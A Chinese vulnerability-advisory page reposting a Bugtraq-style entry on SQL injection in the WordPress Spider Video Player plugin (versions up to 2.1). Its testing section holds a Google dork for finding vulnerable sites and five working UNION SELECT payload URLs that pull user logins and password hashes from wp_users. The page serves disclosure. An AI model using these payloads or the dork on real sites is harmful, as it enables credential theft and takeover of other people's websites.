WordPress Spider Video Player插件'theme'参数SQL注入漏洞

发布日期:2013-04-11
更新日期:2013-04-12

受影响系统:
WordPress Spider Video Player < 2.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 59021
 
WordPress Spider Video Player是视频播放器插件。
 
Spider Video Player 2.1存在SQL注入漏洞,攻击者可利用此漏洞执行未授权数据库操作。
 
<*来源:Ashiyane Digital Security Team
 
  链接:
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##############
 # Exploit Title : Wordpress Spider Video Player plugin SQL Injection
 #
 # Exploit Author : Ashiyane Digital Security Team
 #
 # Plugin Link  :
 #
 # Home :
 #
 # Security Risk : High
 #
 # Version : 2.1
 #
 # Dork : inurl:wp-content/plugins/player/settings.php?playlist=
 #
 # Tested on: Linux
 #
 ##############
 #Location:site/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
 #
 #
 #DEm0:
 # ?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
 #
 # ?playlist=1&theme=-6+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
 #
 # ?playlist=1&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
 #
 # ?playlist=1&theme=-4+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
 #
 # ?playlist=2&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
 #
 ##############
 #Greetz to: My Lord ALLAH
 ##############
 #
 # Amirh03in
 #
 ##############

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
WordPress
 ---------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/ppswj.html